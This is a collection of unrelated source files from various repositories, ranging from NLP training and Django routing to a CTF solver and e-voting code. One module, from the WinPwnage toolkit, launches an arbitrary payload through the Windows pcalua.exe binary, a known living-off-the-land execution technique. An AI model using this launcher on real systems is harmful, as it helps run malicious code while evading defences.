|
/appPy/generation_module.py
|
f1ae6e89debd9f6dd55c42720dd56a11b46b9109
|
[] |
no_license
|
pichayak/sentiment-style-transfer
|
610d8e31e27ae9c92a17a5f3d8353ee3ea8de577
|
4a4f89a41913c5e2e5975efe2b0f174cc21c5806
|
refs/heads/main
| 2023-04-29T21:46:26.041077
| 2021-05-25T15:34:26
| 2021-05-25T15:34:26
| 362,867,529
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,599
|
py
|
# -*- coding: utf-8 -*-
# !pip install -q transformers==4.1.1 sentencepiece
# !pip install -q pytorch-lightning
import argparse
import csv
import os
import shutil
import ast
import pandas as pd
import re
import numpy as np
import torch
from torch.utils.data import Dataset, DataLoader
from pytorch_lightning import LightningModule, Trainer, seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from transformers import (
T5Tokenizer,
MT5ForConditionalGeneration,
AdamW,
get_linear_schedule_with_warmup
)
from transformers.models.bart.modeling_bart import shift_tokens_right
def preprocess(x):
attrs = x['pos_attr'].split(' ')
for attr in attrs:
x['target'] = x['target'].replace('<mask>',attr,1)
return x
class DialogueDataset(Dataset):
def __init__(self, data_dir, split, tokenizer, max_length):
# Preprocessing
data = pd.read_csv('/content/drive/Shareddrives/Pretend To Understand NLP/retrieve_output_tfidf.csv')
data['pos_attr'] = data['pos_attr'].apply(lambda x: x[2:-2].replace("', '",' '))
data['target'] = data['neg_content']
data['neg_content'] = data['neg_content'].apply(lambda x: x.replace('<mask>',''))
data['source'] = '<ATTRS> ' + data['pos_attr'] + ' <CONT_START> ' + data['neg_content'] + ' <START>'
data = data.apply(preprocess, axis=1)
data = data.drop(['neg_sentence','neg_content','pos_attr'], axis=1)
model_input = data['source']
src_texts = model_input.to_list()
tgt_texts = data['target'].to_list()
self.batch = tokenizer.prepare_seq2seq_batch(
src_texts=src_texts,
tgt_texts=tgt_texts,
max_length=max_length,
return_tensors='pt'
)
def __len__(self):
return self.batch['input_ids'].size(0)
def __getitem__(self, index):
input_ids = self.batch['input_ids'][index]
attention_mask = self.batch['attention_mask'][index]
labels = self.batch['labels'][index]
return {
'input_ids': input_ids,
'attention_mask': attention_mask,
'labels': labels
}
def label_smoothed_nll_loss(lprobs, target, epsilon, ignore_index=-100):
'''From fairseq'''
if target.dim() == lprobs.dim() - 1:
target = target.unsqueeze(-1)
nll_loss = -lprobs.gather(dim=-1, index=target)
smooth_loss = -lprobs.sum(dim=-1, keepdim=True)
if ignore_index is not None:
pad_mask = target.eq(ignore_index)
nll_loss.masked_fill_(pad_mask, 0.0)
smooth_loss.masked_fill_(pad_mask, 0.0)
else:
nll_loss = nll_loss.squeeze(-1)
smooth_loss = smooth_loss.squeeze(-1)
nll_loss = nll_loss.sum()
smooth_loss = smooth_loss.sum()
eps_i = epsilon / lprobs.size(-1)
loss = (1.0 - epsilon) * nll_loss + eps_i * smooth_loss
return loss, nll_loss
class MT5Trainer(LightningModule):
def __init__(self, params):
super().__init__()
self.save_hyperparameters(params)
self.tokenizer = T5Tokenizer.from_pretrained('google/mt5-small')
self.model = MT5ForConditionalGeneration.from_pretrained('google/mt5-small')
# Special tokens
special_tokens_dict = {'additional_special_tokens': ['<ATTRS>','<CONT_START>','<START>']}
num_added_tokens = self.tokenizer.add_special_tokens(special_tokens_dict)
# loader
dataset = DialogueDataset(
data_dir=self.hparams.data_dir,
split='train',
tokenizer=self.tokenizer,
max_length=self.hparams.max_length
)
self.train_loader = DataLoader(
dataset=dataset,
batch_size=self.hparams.train_batch_size,
shuffle=True
)
def forward(self, input_ids, attention_mask, decoder_input_ids):
return self.model(
input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids
)
def training_step(self, batch, batch_idx):
pad_token_id = self.tokenizer.pad_token_id
input_ids = batch['input_ids']
attention_mask = batch['attention_mask']
labels = batch['labels']
decoder_input_ids = shift_tokens_right(labels, pad_token_id)
outputs = self(
input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids
)
logits = outputs[0]
lprobs = torch.nn.functional.log_softmax(logits, dim=-1)
loss, nll_loss = label_smoothed_nll_loss(
lprobs=lprobs,
target=labels,
epsilon=self.hparams.label_smoothing,
ignore_index=pad_token_id
)
self.log('train_loss', loss, on_epoch=True, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
pad_token_id = self.tokenizer.pad_token_id
input_ids = batch['input_ids']
attention_mask = batch['attention_mask']
labels = batch['labels']
decoder_input_ids = shift_tokens_right(labels, pad_token_id)
outputs = self(
input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids
)
logits = outputs[0]
lprobs = torch.nn.functional.log_softmax(logits, dim=-1)
loss, nll_loss = label_smoothed_nll_loss(
lprobs=lprobs,
target=labels,
epsilon=self.hparams.label_smoothing,
ignore_index=pad_token_id
)
self.log('val_loss', loss, prog_bar=True)
def test_step(self, batch, batch_idx):
input_ids = batch['input_ids']
attention_mask = batch['attention_mask']
# https://huggingface.co/blog/how-to-generate
beam_outputs = self.model.generate(
input_ids=input_ids,
attention_mask=attention_mask,
max_length=50,
num_beams=5,
no_repeat_ngram_size=2,
early_stopping=True
)
preds = [
self.tokenizer.decode(beam_output, skip_special_tokens=True)
for beam_output in beam_outputs
]
return preds
def test_epoch_end(self, outputs):
with open(os.path.join(self.hparams.output_dir, 'preds.txt'), 'w') as f:
for output in outputs:
f.write('\n'.join(output) + '\n')
def configure_optimizers(self):
# optimizer
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{
'params': [
p for n, p in self.model.named_parameters()
if not any(nd in n for nd in no_decay)
],
'weight_decay': self.hparams.weight_decay
},
{
'params': [
p for n, p in self.model.named_parameters()
if any(nd in n for nd in no_decay)
],
'weight_decay': 0.0
},
]
betas = tuple(map(float, self.hparams.adam_betas[1:-1].split(',')))
optimizer = AdamW(
optimizer_grouped_parameters,
betas=betas,
eps=self.hparams.adam_eps,
lr=self.hparams.lr
)
# scheduler
num_training_steps = (
len(self.train_loader)
// self.hparams.accumulate_grad_batches
* self.hparams.max_epochs
)
lr_scheduler = get_linear_schedule_with_warmup(
optimizer,
num_warmup_steps=self.hparams.num_warmup_steps,
num_training_steps=num_training_steps
)
lr_dict = {'scheduler': lr_scheduler, 'interval': 'step'}
return [optimizer], [lr_dict]
def train_dataloader(self):
return self.train_loader
def val_dataloader(self):
dataset = DialogueDataset(
data_dir=self.hparams.data_dir,
split='val',
tokenizer=self.tokenizer,
max_length=self.hparams.max_length
)
loader = DataLoader(
dataset=dataset,
batch_size=self.hparams.val_batch_size
)
return loader
def test_dataloader(self):
dataset = DialogueDataset(
data_dir=self.hparams.data_dir,
split='test',
tokenizer=self.tokenizer,
max_length=self.hparams.max_length
)
loader = DataLoader(
dataset=dataset,
batch_size=self.hparams.val_batch_size
)
return loader
args = argparse.Namespace(
data_dir='dataset',
output_dir="weights",
seed=42,
label_smoothing=0.1,
weight_decay=0.1,
lr=1e-4,
adam_betas='(0.9,0.999)',
adam_eps=1e-6,
num_warmup_steps=500,
train_batch_size=4,
val_batch_size=4,
max_length=128,
accumulate_grad_batches=16,
gpus=1,
gradient_clip_val=0.1,
max_epochs=40
)
if os.path.isdir(args.output_dir):
shutil.rmtree(args.output_dir)
os.mkdir(args.output_dir)
checkpoint_callback = ModelCheckpoint(
dirpath=args.output_dir,
monitor='val_loss',
mode='min',
)
trainer = Trainer(
callbacks=[checkpoint_callback],
gradient_clip_val=args.gradient_clip_val,
gpus=args.gpus,
accumulate_grad_batches=args.accumulate_grad_batches,
max_epochs=args.max_epochs,
)
def load_model():
model = MT5Trainer(args)
model = model.load_from_checkpoint('/content/drive/Shareddrives/Pretend To Understand NLP/weights.ckpt')
return model
def pr(text):
print(text)
def predict(model, attrs, context):
txt = '<ATTRS> ' + ' '.join(attrs) + ' <CONT_START> ' + context.replace('<mask>','') + ' <START>'
input_ids = model.tokenizer.encode(txt, return_tensors='pt')
beam_output = model.model.generate(
input_ids,
max_length=50,
num_beams=10,
early_stopping=True,
num_return_sequences=5,
)
outputs = []
for i in beam_output:
output = model.tokenizer.decode(i)
output = re.sub("</s>.*", "", output)
output = re.sub("(<pad>|<mask>|<extra_id_[0-9]*>)\s?", "", output)
outputs.append(output.strip())
return outputs
# model = load_model()
# predict(model, ['อยาก'], '<mask>กินข้าวร้านนั้นเลยอ่ะ ไม่อร่อย รสชาติมาก')
|
[
"i.love.u.baby2353@gmail.com"
] |
i.love.u.baby2353@gmail.com
|
f9f228e3279fac5da75e69c3e095ec6c6b668324
|
83c26e4b6e4a3b028cf0c44ad03da72ce8e23fef
|
/mblog/urls.py
|
4f43436905ebb5411c919fe1e43dc6dc7567c003
|
[
"Apache-2.0"
] |
permissive
|
sharpcj/MyDjangoBlog
|
d5d98962a1c8a874ef13fdac27874c2e855b237e
|
07b434b73dbadc02b751e2a847cf083da8634190
|
refs/heads/master
| 2021-01-23T10:08:35.190672
| 2017-09-08T15:02:53
| 2017-09-08T15:02:53
| 102,609,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 869
|
py
|
"""mblog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from mainsite.views import homepage, showpost
urlpatterns = [
url(r'^$', homepage),
url(r'^admin/', admin.site.urls),
url(r'^post/(\w+)$',showpost)
]
|
[
"li_joy99@163.com"
] |
li_joy99@163.com
|
821d4ee6e80527f333708910e8298d43b33f94c0
|
1bfe5e92f10d1c6b8fe8f7d4064fcd9b0613fbee
|
/23-03-2017/ejercicio-bucle-informes.py
|
4968bb84b90f336c467ad61196cfafefa5cc4868
|
[] |
no_license
|
ism46999937/M03
|
1c3b7e0aedd9202ef7c1d4c335bbaa1da8e1016b
|
1c0fbd4588e8e90d7f9d12b9fed666f55b549b20
|
refs/heads/master
| 2020-02-26T15:09:32.915113
| 2019-10-29T10:56:07
| 2019-10-29T10:56:07
| 83,586,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
#!/usr/bin/python
# coding: utf-8
import time
import os
os.system ('clear')
time.sleep (2)
anyo = 2010
salir = False
while salir == False:
print ("")
anyo = input ("Teclee un año 2010 o 2016: ")
if anyo <= 2016 :
print "Informe", anyo
else:
if anyo > 2016 :
print "No hay informe para el año especificado"
salir = True
anyo = anyo+1
|
[
"noreply@github.com"
] |
ism46999937.noreply@github.com
|
13318bf1791f00566d303db1a171be23285f26bc
|
43c203bc5cc09eda3f418a64777b091b55383e36
|
/test/log_test.py
|
603ff6c1a6700ab7f8f043b15c61e6c8702354f0
|
[
"Apache-2.0"
] |
permissive
|
mpaladin/python-mtb
|
fc615a8b6f35d4f21866e28f725a8ec4c0f6f33d
|
840f1a37da05efbbb9f6a46e3c9eba43bfe5c3fb
|
refs/heads/master
| 2020-04-26T11:42:22.266378
| 2013-04-25T07:26:42
| 2013-04-25T07:26:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,533
|
py
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright (C) 2013 CERN
"""
import logging
import os
import shutil
import unittest
import mtb.log as log
from mtb.test import parametrized
LOG_OPERATIONS = "debug info warning error critical".split()
TEST_DIR = os.path.abspath("test_tmp")
class LogTest(unittest.TestCase):
""" Test :py:mod:`mtb.log` utilities module. """
def setUp(self):
""" Setup the test environment for the log test. """
# remove the test folder
shutil.rmtree(TEST_DIR, True)
# and create it again
try:
os.mkdir(TEST_DIR)
except OSError:
pass
def tearDown(self):
""" Restore the test environment and delete the test folder. """
shutil.rmtree(TEST_DIR, True)
@parametrized("log_n log_s".split(), log.LOG_SYSTEMS.items())
def test_init(self, log_n, log_s):
""" Test log system creation. """
print("running log setup for %s" % (log_n,))
extra = dict()
if log_n == "file":
extra = {
"handler_options": {
"filename": os.path.join(TEST_DIR, "file.log"),
}
}
log.setup_log("foo", log_n, extra=extra)
print("...test log setup ok")
@parametrized("log_n log_s".split(), log.LOG_SYSTEMS.items())
def test_log_operations(self, log_n, log_s):
""" Test log system operations. """
print("running log operations checking for %s" % (log_n,))
extra = dict()
if log_n == "file":
extra = {
"handler_options": {
"filename": os.path.join(TEST_DIR, "file.log"),
}
}
log.setup_log("foo", log_n, extra=extra)
logger = logging.getLogger("foo")
for operation in LOG_OPERATIONS:
getattr(logger, operation)(
"log test for %s.%s" % (log_n, operation))
print("...test log operations checking ok")
if __name__ == "__main__":
unittest.main()
|
[
"massimo.paladin@gmail.com"
] |
massimo.paladin@gmail.com
|
ccb882729d998d9bdbd004437f7c994f0bd18d99
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_carapaces.py
|
aad4bf46fdd13e735a62e205495271cc39b6a7e0
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
from xai.brain.wordbase.nouns._carapace import _CARAPACE
#calss header
class _CARAPACES(_CARAPACE, ):
def __init__(self,):
_CARAPACE.__init__(self)
self.name = "CARAPACES"
self.specie = 'nouns'
self.basic = "carapace"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
dbcb8bc5dd9ddbaa524afa2cdafe4606a9a7a19c
|
901f0b1d571959f5ee1c777ce61d1a1c9785454d
|
/winpwnage/functions/execute/exec_pcalua.py
|
0228940f634376d7302ba736e852c539aa2be1dd
|
[] |
no_license
|
0x556c7472614861636b6572/WinPwnage
|
2236847153e2b43968e3c43e3f1fbf9e4b762a1c
|
81d89c75a9718944071ca64390ee16bc33e1c958
|
refs/heads/master
| 2020-05-23T08:54:52.447104
| 2019-05-15T00:34:22
| 2019-05-15T00:34:22
| 186,697,927
| 1
| 0
| null | 2019-05-14T20:46:38
| 2019-05-14T20:46:38
| null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
import os
import random
from winpwnage.core.prints import *
from winpwnage.core.utils import *
#https://lolbas-project.github.io/lolbas/Binaries/Pcalua
pcalua_info = {
"Description": "Executes payload using the Program Compatibility Assistant",
"Id": "2",
"Type": "Execution",
"Fixed In": "99999",
"Works From": "7600",
"Admin": False,
"Function Name": "exec_pcalua",
"Function Payload": True,
}
def exec_pcalua(payload):
if payloads().exe(payload):
paths = []
binary = "pcalua.exe"
print_info("Searching for ({binary}) in system32 and syswow64".format(binary=binary))
for root, dirs, files in os.walk(information().windows_directory()):
for name in files:
if name.lower() == binary:
if "system32" in root.lower() or "syswow64" in root.lower():
paths.append(os.path.join(root, name))
try:
path = random.choice(paths)
except IndexError:
print_error("Unable to proceed, ({binary}) not found on system".format(binary=binary))
return False
else:
print_info("Located ({binary}) binary".format(binary=binary))
print_info("Attempting to launch {payload} using ({binary}) binary".format(payload=payload,binary=binary))
exit_code = process().create(path,
params="-a {payload}".format(payload=payload),
get_exit_code=True)
if exit_code == 0:
print_success("Successfully created process ({}) exit code ({})".format(payload, exit_code))
else:
print_error("Unable to create process ({}) exit code ({})".format(payload, exit_code))
return False
else:
print_error("Cannot proceed, invalid payload")
return False
|
[
"noreply@github.com"
] |
0x556c7472614861636b6572.noreply@github.com
|
e566a3c7c5a3d65eebf04460db5857973c435e42
|
0d1c4ec8784f51be781772dca19278efaf3eb2b4
|
/config.py
|
a9851244be12c076e1389f5b77813a3f80e17c71
|
[
"MIT"
] |
permissive
|
borko81/flask_with_orm
|
0ddaa663454eadfb15acb8cc52cdb4b41063b1b5
|
72d677419fc859acf4a56850a9d96b4b33127956
|
refs/heads/main
| 2023-08-16T13:27:36.509612
| 2021-09-27T12:42:12
| 2021-09-27T12:42:12
| 408,812,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SECRET_KEY = os.environ.get('SECRET_KEY') or 'you-will-never-guest'
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or 'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
[
"bstoilov81@gmail.com"
] |
bstoilov81@gmail.com
|
fbc658b8bd1b68d8329f5058d093752c0b3149eb
|
20bbd17aec6ffe08d36e5e98c841585c40b3c3e8
|
/.history/main_server_20180718180933.py
|
2f584b591dd8b06903ee6ffd5f4b71cee075f23b
|
[] |
no_license
|
NickCongyuLiu/minieye-cpu-master
|
e29c699fe1cd65ea0b6081c2fb8b51b864ea8b27
|
a0b4a6d5bd2df976b825fe6565bb62d1f74c665b
|
refs/heads/master
| 2020-03-23T21:18:54.998888
| 2018-08-10T09:58:32
| 2018-08-10T09:58:32
| 142,097,251
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,589
|
py
|
#coding=utf-8
import tornado.web
import tornado.ioloop
import tornado.httpserver
import tornado.options
import os
import datetime
import time
import json
from tornado.web import RequestHandler
from tornado.options import define, options
from tornado.websocket import WebSocketHandler
define("port", default=1213, type=int)
class ChatHandler(WebSocketHandler):
#建立websocket连接
def open(self):
self.write_message("connected")
def data_cleaning(self,origin_data):
info = origin_data.split("\n")
CPU_temp = []
CPU_one_freq = []
CPU_two_freq = []
CPU_timeStamp = []
CPU_power =[]
# lane_alg_fps =[]
# lane_fps=[]
# vehicle_alg_fps=[]
# v1_process_fps=[]
data_set = []
# read_info = []
takeOrNot=False
for line in info:
if ('Output info' in line):
takeOrNot = True
elif ('Input info' in line):
takeOrNot = False
elif ('timeStamp' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip()[0:13])
data_set.append([meta_data])
elif ('mtktscpu :' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip())
data_set[-1].append(meta_data)
elif ('CPU#0:' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1].strip())
data_set[-1].append(meta_data)
elif ('CPU#4:' in line):
if(takeOrNot):
meta_data = int(line.split(':')[1][1:6])
data_set[-1].append(meta_data)
elif ('current power =' in line):
if(takeOrNot):
meta_data = int(line.split('current power =')[1].strip()[0:4])
data_set[-1].append(meta_data)
elif ('lane.alg_fps' in line):
if(takeOrNot):
meta_data = line.split('lane.alg_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
# 脏数据
if(meta_data_arr[0] =='fps'):
data_set.append([int(meta_data_arr[1][0:13]),float(meta_data_arr[2]),'lane_alg_fps'])
else:
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'lane_alg_fps'])
elif ('lane.fps' in line):
if(takeOrNot):
meta_data = line.split('lane.fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'lane_fps'])
# data_set.append((line.split('lane.fps')[1].strip().split(' ')))
elif ('vehicle.alg_fps' in line):
if(takeOrNot):
meta_data = line.split('vehicle.alg_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'vehicle_alg_fps'])
elif ('v1.process_fps' in line):
if(takeOrNot):
meta_data = line.split('v1.process_fps')[1].strip()
meta_data_arr = meta_data.split(' ')
data_set.append([int(meta_data_arr[0][0:13]),float(meta_data_arr[1]),'v1.process_fps'])
data_set.sort()
mess = json.dumps(data_set,ensure_ascii=False)
self.write_message(mess)
return 'hello'
#websocket接受信息
def on_message(self, message):
if(message[0:4]=="file"):
mess = message[4:]
mess = self.data_cleaning(mess)
else:
mess = "verybad"
# self.write_message(mess)
#关闭websocket
def on_close(self):
print('connection closed')
pass
#允许跨域请求
def check_origin(self, origin):
return True
if __name__ == '__main__':
tornado.options.parse_command_line()
app = tornado.web.Application([
(r"/chat", ChatHandler),
],
static_path = os.path.join(os.path.dirname(__file__), "static"),
template_path = os.path.join(os.path.dirname(__file__), "template"),
debug = True
)
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(options.port)
tornado.ioloop.IOLoop.current().start()
|
[
"Liucongyu1993@yahoo.com"
] |
Liucongyu1993@yahoo.com
|
41929e1c80c40f72ea1272f059348c5d40882d5b
|
faa1a9f8bfa60c6f3c1543ddf5c01ea8d6ec5898
|
/BalsnCTF-2019/reverse/vim/solve.py
|
152bb17d4a19d61ca5a51bb5db34279ca7fe63c5
|
[] |
no_license
|
LJP-TW/CTF
|
afe0873029072da256b591c96a0b2a97df6644b2
|
f9c30cf270130120bfe4ddf957299fb60ddf8c27
|
refs/heads/master
| 2023-05-27T17:08:56.579815
| 2023-05-22T10:33:42
| 2023-05-22T10:33:42
| 123,657,738
| 30
| 5
| null | 2023-05-22T10:32:56
| 2018-03-03T04:08:05
|
Smali
|
UTF-8
|
Python
| false
| false
| 3,313
|
py
|
# coding: utf-8
# In[6]:
from sympy import Matrix, pprint
import codecs
from collections import defaultdict
import numpy as np
def func1(lst, lng):
def toBlock(blk):
ret = []
for i in range(4):
for j in range(4):
ret.append(blk[i + j * 4])
return ret
lst = toBlock(lst)
ret = []
temp = []
for base in range(4):
for i, n in enumerate(lst):
num = 0
n = n - 1
for r in range(31):
if n > 0:
n = n - 1
num = num + lng[base * 4 + i % 4] - 1
num = num % 32
temp.append(num + 1)
if len(temp) == 4:
total = temp[0]
for t in temp[1:]:
total = total + t - 1
total = total % 32
ret.append(total)
temp = []
return ret
def solveP(fun1_res, Q):
m = 32
fun1_res = np.array(fun1_res).reshape((4, 4))
Q = np.array(Q).reshape((4, 4))
PT = np.matmul( Matrix(Q - 1).inv_mod(32) , fun1_res - 1) % m
P = (PT + 1) % m
return list(P.reshape(16))
def shift(y):
_y = y
if _y % 2 == 1:
_y = _y + 1
_y //= 2
if _y % 2 == 1:
_y = _y + 1
_y //= 2
y = y * 2 - 2
y = y % 32 + 1
y = y * 2 - 2
y = y % 32 + 1
y = y * 2 - 2
y = y % 32 + 1
y = y + _y - 2
y = y % 32 + 1
return y
shiftMap = {0:0}
revShiftMap = {0:0}
for i in range(32):
the = shift(i)
shiftMap[i] = the
revShiftMap[the] = i
def func2(X, Y):
table70 = [1]
index = 0
for x, y in zip(X, Y):
v = (table70[index] +shiftMap[y] - 2) % 32 + 1
v = (v + shiftMap[x] - 2) % 32 + 1
table70.append(v)
index += 1
return table70[1:]
def solveY(X, V):
prev = 1
Y = []
for x, v in zip(X, V):
the_v = v
v = ( (v - 1) % 32 - shiftMap[x] + 2) % 32
yp = ( (v - 1) % 32 - prev + 2) % 32
prev = the_v
Y.append(revShiftMap[yp])
return Y
ans_dict = defaultdict(list)
for i in range(128):
ans_dict[ord((codecs.encode(chr(i), 'rot_13')[0])) % 32 + 1].append(chr(i))
ans_dict[0] = ['_','_','_','_']
# In[13]:
padding = 'Welcome_to_th1s_'
flag = 'qristuvwxezabcde'
table2 = list(ord(c) % 32 + 1 for c in codecs.encode(padding + flag, 'rot_13'))
print("trying solveP")
print("original answer:", table2[:16])
print("solved answer:",solveP(func1(table2[:16], table2[:16]), table2[:16]))
X = func1(table2[:16], table2[:16])
Y = func1(table2[16:32],X)
my_ans = func2(X,Y)
print("trying solveY")
print("original answer:", Y)
print("solved answer:", solveY(X, my_ans))
print("trying reversing my_ans")
solved_Y = solveY(X, my_ans)
P = solveP(solved_Y, X)
print("original answer:", table2[16:32])
print("solved answer:",P)
for i in P:
print(ans_dict[i][3], end="")
print()
# In[14]:
answer = [23, 30, 17, 21, 26, 7, 22, 3, 1, 18, 4, 17, 2, 10, 21, 9]
answer = [24, 31, 18, 22, 27, 8, 23, 4, 2, 19, 5, 18, 3, 11, 22, 10]
print("trying reversing answer")
solved_Y = solveY(X, answer)
print(solved_Y)
P = solveP(solved_Y, X)
print(P)
s = ""
for i in P:
s += (ans_dict[i][3])
print(f"Balsn{{{s}r}}")
|
[
"accr94238@gmail.com"
] |
accr94238@gmail.com
|
39459b8873611c5c979305418444f396736eae9c
|
7d3a2fbc85f0d9a9f80bfda0b0fa72bbaae42e67
|
/replace.py
|
cc857cce6259da367b906501a2dfe0eb7bd52531
|
[] |
no_license
|
saif21/Blockchain-e-voting
|
b7e88d7bb924c823b22559507858fb46399f2cd4
|
c7da0064033afb47a572c830d3f7a43dc0a3c0a6
|
refs/heads/main
| 2023-06-09T19:37:04.360329
| 2021-07-01T17:18:02
| 2021-07-01T17:18:02
| 381,299,737
| 0
| 0
| null | 2021-06-29T09:36:47
| 2021-06-29T08:51:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,408
|
py
|
from sql import ReplaceData, VoteDatabase
import json
from database import db, cursor, db1, cursor1, db2, cursor2, db3, cursor3, db4, cursor4, db5, cursor5
# longest_chain = chain
# smaller_chain = self.get_chain()
replaceBlock = ReplaceData()
class Replace():
def __init__(self):
self.orphan_block = []
# obtaining orphan block
def get_orphan_block(self, longest_chain, smaller_chain):
self.longest_chain = longest_chain
self.smaller_chain = smaller_chain
for i in range(len(self.smaller_chain)):
if self.longest_chain[i]['proof'] != self.smaller_chain[i]['proof']:
self.orphan_block = smaller_chain[i:]
return self.orphan_block
# orphan_block(longest_chain, smaller_chain)
# obtaining orphan block votes and add to orphan DB
def add_to_orphanDB(self):
if self.orphan_block:
for j in self.orphan_block:
replaceBlock.add_vote_to_orphan_DB(j['vote'])
def update_block_db1(self, longest_chain):
self.longest_chain = longest_chain
self.sql1 = ("DELETE FROM block")
cursor1.execute(self.sql1)
db1.commit()
for k in longest_chain:
index = k['index']
previous_hash = k['previous_hash']
proof = k['proof']
timestamp = k['timestamp']
data = json.dumps(k['votes'])
# print("Time:", timestamp)
replaceBlock.update_block1(
index, previous_hash, proof, timestamp, data)
def update_block_db2(self, longest_chain):
self.longest_chain = longest_chain
self.sql1 = ("DELETE FROM block")
cursor2.execute(self.sql1)
db2.commit()
self.longest_chain = longest_chain
for k in longest_chain:
index = k['index']
previous_hash = k['previous_hash']
proof = k['proof']
timestamp = k['timestamp']
data = json.dumps(k['votes'])
replaceBlock.update_block2(
index, previous_hash, proof, timestamp, data)
def update_block_db3(self, longest_chain):
self.longest_chain = longest_chain
self.sql1 = ("DELETE FROM block")
cursor3.execute(self.sql1)
db3.commit()
self.longest_chain = longest_chain
for k in longest_chain:
index = k['index']
previous_hash = k['previous_hash']
proof = k['proof']
timestamp = k['timestamp']
data = json.dumps(k['votes'])
replaceBlock.update_block3(
index, previous_hash, proof, timestamp, data)
def update_block_db4(self, longest_chain):
self.longest_chain = longest_chain
self.sql1 = ("DELETE FROM block")
cursor4.execute(self.sql1)
db4.commit()
self.longest_chain = longest_chain
for k in longest_chain:
index = k['index']
previous_hash = k['previous_hash']
proof = k['proof']
timestamp = k['timestamp']
data = json.dumps(k['votes'])
replaceBlock.update_block4(
index, previous_hash, proof, timestamp, data)
def update_block_db5(self, longest_chain):
self.longest_chain = longest_chain
self.sql1 = ("DELETE FROM block")
cursor5.execute(self.sql1)
db5.commit()
self.longest_chain = longest_chain
for k in longest_chain:
index = k['index']
previous_hash = k['previous_hash']
proof = k['proof']
timestamp = k['timestamp']
data = json.dumps(k['votes'])
replaceBlock.update_block5(
index, previous_hash, proof, timestamp, data)
vote = VoteDatabase()
class LongestChain():
def __init__(self):
self.evote1 = vote.loadblock1()
self.evote2 = vote.loadblock2()
self.evote3 = vote.loadblock3()
self.evote4 = vote.loadblock4()
self.evote5 = vote.loadblock5()
self.evote1_chain = []
self.evote2_chain = []
self.evote3_chain = []
self.evote4_chain = []
self.evote5_chain = []
def get_chain(self, chains):
self.chains = chains
self.chain = [] # need change to loadblock1-5
for i in chains:
d = {}
d['index'] = i['id']
d['previous_hash'] = i['previous_hash']
d['proof'] = i['proof']
d['timestamp'] = i['timestamp']
d['votes'] = json.loads(i['data'])
self.chain.append(d)
return self.chain
def longest_chain(self):
self.evote1_chain = self.get_chain(self.evote1)
self.evote2_chain = self.get_chain(self.evote2)
self.evote3_chain = self.get_chain(self.evote3)
self.evote4_chain = self.get_chain(self.evote4)
self.evote5_chain = self.get_chain(self.evote5)
list1 = [self.evote1_chain, self.evote2_chain,
self.evote3_chain, self.evote4_chain, self.evote5_chain]
longest_list = max(len(elem) for elem in list1)
longest = None
for i in list1:
if len(i) == longest_list:
longest = i
return longest
|
[
"noreply@github.com"
] |
saif21.noreply@github.com
|
2153ab647e3fd3822a2c8871f0a832841d873c3c
|
2d2ba03f4c4bbe1ec93d997d23b162f753462181
|
/helios_lib/crypto/utils.py
|
c58aa896c821dd268f1d3f309d0341c431bb52a7
|
[
"MIT"
] |
permissive
|
omidraha/helios_lib
|
1192f3926f409e9d0d047c8008c116331b07159f
|
0f62824a4b2d4dbe6a9b5decffd59cf7d5b299df
|
refs/heads/master
| 2020-04-02T09:26:02.151320
| 2018-11-12T10:07:32
| 2018-11-12T10:07:32
| 154,292,657
